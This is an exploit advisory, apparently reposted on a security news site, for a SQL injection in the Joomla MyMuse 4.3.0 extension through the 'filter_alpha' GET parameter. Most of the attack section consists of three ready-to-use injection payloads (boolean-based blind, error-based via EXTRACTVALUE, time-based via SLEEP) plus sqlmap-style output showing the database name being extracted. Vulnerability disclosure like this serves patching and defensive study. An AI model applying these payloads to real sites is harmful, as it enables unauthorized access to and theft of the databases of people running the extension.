Home Tools Exploits & CVE's Joomla MyMuse 4.3.0 SQL Injection

Joomla MyMuse 4.3.0 SQL Injection

October 2, 2022

445

Authored by CraCkEr

Joomla MyMuse extension version 4.3.0 suffers from a remote SQL injection vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││                                     C r a C k E r                                    ┌┘
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                      [ Exploits ]                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                                                                    :
│  Website  : extensions.joomla.org                                                      │
│  Vendor   : Gordon Fisch - joomlamymuse.com                                            │
│  Software : MyMuse 4.3.0 Extension for Joomla                                          │
│  Vuln Type: SQL Injection                                                              │
│  Method   : GET                                                                        │
│  Impact   : Database Access                                                            │
│                                                                                        │
│────────────────────────────────────────────────────────────────────────────────────────│
│                              B4nks-NET irc.b4nks.tk #unix                             ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│  Release Notes:                                                                        │
│  ═════════════                                                                         │
│  Typically used for remotely exploitable vulnerabilities that can lead to              │
│  system compromise                                                                     │
│                                                                                        │
│                                                                                        │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

  CryptoJob (Twitter) twitter.com/CryptozJob

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                    © CraCkEr 2022                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /index.php/en/mymuse-views/list-of-tracks?filter_alpha=A

GET parameter 'filter_alpha' is vulnerable

---
Parameter: filter_alpha (GET)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: filter_alpha=A%' AND MAKE_SET(5052=5052,3360) AND 'xQKG%'='xQKG&filter_order=a.title ASC&limit=10&start=10

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: filter_alpha=A%' AND EXTRACTVALUE(2078,CONCAT(0x5c,0x716a6b7671,(SELECT (ELT(2078=2078,1))),0x71627a7671)) AND 'QXSg%'='QXSg&filter_order=a.title ASC&limit=10&start=10

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: filter_alpha=A%' AND (SELECT 5976 FROM (SELECT(SLEEP(5)))vLkv) AND 'tLCw%'='tLCw&filter_order=a.title ASC&limit=10&start=10
---


[+] Starting the Attack


[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.1
[INFO] fetching current database
INFO] retrieved: '*********'
current database: ''*********''



[-] Done

Joomla MyMuse 4.3.0 SQL Injection

Follow us on Instagram @thecyberpost

EDITOR PICKS

Armenian Officials Trained on Essential Techniques and Tools for Effective Crypto-Crime...

Kaiser’s website tracking tools may have compromised data on 13 million...

British intelligence moves to protect research universities from espionage

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

WebKit PointerCaptureController::processPendingPointerCapture Heap Use-After-Free

Xlight FTP 3.9.3.2 Buffer Overflow

Academy LMS 5.15 Cross Site Scripting